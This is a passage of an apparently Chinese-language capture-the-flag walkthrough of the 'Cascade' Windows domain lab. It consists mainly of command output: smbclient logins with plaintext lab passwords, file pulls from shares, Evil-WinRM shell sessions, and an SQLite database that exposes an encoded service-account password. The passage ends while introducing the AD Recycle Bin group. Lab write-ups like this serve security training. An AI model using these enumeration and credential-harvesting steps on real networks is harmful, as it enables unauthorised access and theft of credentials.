\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}\Machine . D 0 Fri Jan 1003:42:402020 .. D 0 Fri Jan 1003:42:402020
\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}\User . D 0 Fri Jan 1003:42:402020 .. D 0 Fri Jan 1003:42:402020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 Windows NT D 0 Thu Jan 923:31:402020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts . D 0 Thu Jan 923:50:502020 .. D 0 Thu Jan 923:50:502020 Shutdown D 0 Thu Jan 923:50:502020 Startup D 0 Thu Jan 923:50:502020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts . D 0 Fri Jan 1003:45:582020 .. D 0 Fri Jan 1003:45:582020 Shutdown D 0 Fri Jan 1003:45:582020 Startup D 0 Fri Jan 1003:45:582020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Documents & Settings . D 0 Fri Jan 1003:46:062020 .. D 0 Fri Jan 1003:46:062020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts . D 0 Fri Jan 1003:46:062020 .. D 0 Fri Jan 1003:46:062020 Logoff D 0 Fri Jan 1003:46:062020 Logon D 0 Wed Jan 2906:07:492020 scripts.ini H 6 Wed Jan 2906:07:512020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Applications . D 0 Fri Jan 1005:56:532020 .. D 0 Fri Jan 1005:56:532020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 Windows NT D 0 Thu Jan 923:31:402020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts . D 0 Fri Jan 1002:44:582020 .. D 0 Fri Jan 1002:44:582020 Shutdown D 0 Fri Jan 1002:44:582020 Startup D 0 Fri Jan 1002:44:582020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 SecEdit D 0 Thu Jan 923:51:092020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\Shutdown . D 0 Thu Jan 923:50:502020 .. D 0 Thu Jan 923:50:502020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\Startup . D 0 Thu Jan 923:50:502020 .. D 0 Thu Jan 923:50:502020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts\Shutdown . D 0 Fri Jan 1003:45:582020 .. D 0 Fri Jan 1003:45:582020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts\Startup . D 0 Fri Jan 1003:45:582020 .. D 0 Fri Jan 1003:45:582020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts\Logoff . D 0 Fri Jan 1003:46:062020 .. D 0 Fri Jan 1003:46:062020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts\Logon . D 0 Wed Jan 2906:07:492020 .. D 0 Wed Jan 2906:07:492020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 SecEdit D 0 Mon Jan 2701:12:152020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts\Shutdown . D 0 Fri Jan 1002:44:582020 .. D 0 Fri Jan 1002:44:582020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts\Startup . D 0 Fri Jan 1002:44:582020 .. D 0 Fri Jan 1002:44:582020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit . D 0 Thu Jan 923:51:092020 .. D 0 Thu Jan 923:51:092020 GptTmpl.inf A 1248 Mon Mar 2316:33:592020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit . D 0 Mon Jan 2701:12:152020 .. D 0 Mon Jan 2701:12:152020 GptTmpl.inf A 4086 Mon Jan 2701:12:152020
根据SMB共享的文件情况,开始枚举看看有啥好东西
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 2711:27:342020 .. D 0 Mon Jan 2711:27:342020 Contractors D 0 Mon Jan 1309:45:112020 Finance D 0 Mon Jan 1309:45:062020 IT D 0 Wed Jan 2902:04:512020 Production D 0 Mon Jan 1309:45:182020 Temps D 0 Mon Jan 1309:45:152020
6553343 blocks of size 4096.1613814 blocks available smb: \> get \IT\"Email Archives"\Meeting_Notes_June_2018.html getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as \IT\Email Archives\Meeting_Notes_June_2018.html (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec) smb: \> get \IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (2.6 KiloBytes/sec) (average 4.1 KiloBytes/sec) smb: \> get \IT\Logs\DCs\dcdiag.log getting file \IT\Logs\DCs\dcdiag.log of size 5967 as \IT\Logs\DCs\dcdiag.log (11.6 KiloBytes/sec) (average 6.8 KiloBytes/sec) smb: \> get \IT\Temp\s.smith\"VNC Install.reg" getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as \IT\Temp\s.smith\VNC Install.reg (5.9 KiloBytes/sec) (average 6.6 KiloBytes/sec) smb: \> exit
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva Try "help" to get a list of possible commands. smb: \> get MapAuditDrive.vbs getting file \MapAuditDrive.vbs of size 258 as MapAuditDrive.vbs (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec) smb: \> get MapDataDrive.vbs getting file \MapDataDrive.vbs of size 255 as MapDataDrive.vbs (0.5 KiloBytes/sec) (average 0.6 KiloBytes/sec) smb: \> exit
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith User name s.smith Full Name Steve Smith Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set1/28/20208:58:05 PM Password expires Never Password changeable 1/28/20208:58:05 PM Password required Yes User may change password No
Workstations allowed All Logon script MapAuditDrive.vbs User profile Home directory Last logon 1/29/202012:26:39 AM
Logon hours allowed All
Local Group Memberships *Audit Share *IT *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents>
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share" Alias name Audit Share Comment \\Casc-DC1\Audit$
Members
------------------------------------------------------------------------------- s.smith The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents>
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd C:\shares\audit *Evil-WinRM* PS C:\shares\audit> ls
Directory: C:\shares\audit
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/28/20209:40 PM DB d----- 1/26/202010:25 PM x64 d----- 1/26/202010:25 PM x86 -a---- 1/28/20209:46 PM 13312 CascAudit.exe -a---- 1/29/20206:00 PM 12288 CascCrypto.dll -a---- 1/28/202011:29 PM 45 RunAudit.bat -a---- 10/27/20196:38 AM 363520 System.Data.SQLite.dll -a---- 10/27/20196:38 AM 186880 System.Data.SQLite.EF6.dll
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2 -c "recurse; ls" . D 0 Thu Jan 3002:01:262020 .. D 0 Thu Jan 3002:01:262020 CascAudit.exe An 13312 Wed Jan 2905:46:512020 CascCrypto.dll An 12288 Thu Jan 3002:00:202020 DB D 0 Wed Jan 2905:40:592020 RunAudit.bat A 45 Wed Jan 2907:29:472020 System.Data.SQLite.dll A 363520 Sun Oct 2714:38:362019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 2714:38:382019 x64 D 0 Mon Jan 2706:25:272020 x86 D 0 Mon Jan 2706:25:272020
\DB . D 0 Wed Jan 2905:40:592020 .. D 0 Wed Jan 2905:40:592020 Audit.db An 24576 Wed Jan 2905:39:242020
\x64 . D 0 Mon Jan 2706:25:272020 .. D 0 Mon Jan 2706:25:272020 SQLite.Interop.dll A 1639936 Sun Oct 2714:39:202019
\x86 . D 0 Mon Jan 2706:25:272020 .. D 0 Mon Jan 2706:25:272020 SQLite.Interop.dll A 1246720 Sun Oct 2714:34:202019
6553343 blocks of size 4096.1613017 blocks available
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2 Try "help" to get a list of possible commands. smb: \> cd DB smb: \DB\> get Audit.db getting file \DB\Audit.db of size 24576 as Audit.db (35.2 KiloBytes/sec) (average 35.2 KiloBytes/sec) smb: \DB\> exit
┌──(kali㉿offsec)-[~/Desktop] └─$ file Audit.db Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for60
┌──(kali㉿offsec)-[~/Desktop] └─$ sqlite3 Audit.db SQLite version 3.44.22023-11-2411:41:44 Enter ".help"for usage hints. sqlite> .tables DeletedUserAudit Ldap Misc sqlite> select * from DeletedUserAudit; 6|test|Test DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local 7|deleted|deleted guy DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local 9|TempAdmin|TempAdmin DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local sqlite> select * from Ldap; 1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local sqlite> select * from Misc; sqlite>
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2 Try "help" to get a list of possible commands. smb: \> get CascAudit.exe getting file \CascAudit.exe of size 13312 as CascAudit.exe (20.9 KiloBytes/sec) (average 20.9 KiloBytes/sec) smb: \> exit
┌──(kali㉿offsec)-[~/Desktop] └─$ file CascAudit.exe CascAudit.exe: PE32 executable(console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\arksvc\Documents> whoami cascade\arksvc *Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc User name arksvc Full Name ArkSvc Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set1/9/20205:18:20 PM Password expires Never Password changeable 1/9/20205:18:20 PM Password required Yes User may change password No
Workstations allowed All Logon script User profile Home directory Last logon 5/13/20241:36:30 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
21、AD Recycle Bin是一个著名的Windows小组。Active Directory 对象恢复(或回收站)是 Server 2008 中添加的一项功能,允许管理员恢复已删除的项目,就像回收站恢复文件一样。链接的文章提供了一个 PowerShell 命令来查询域中所有已删除的对象: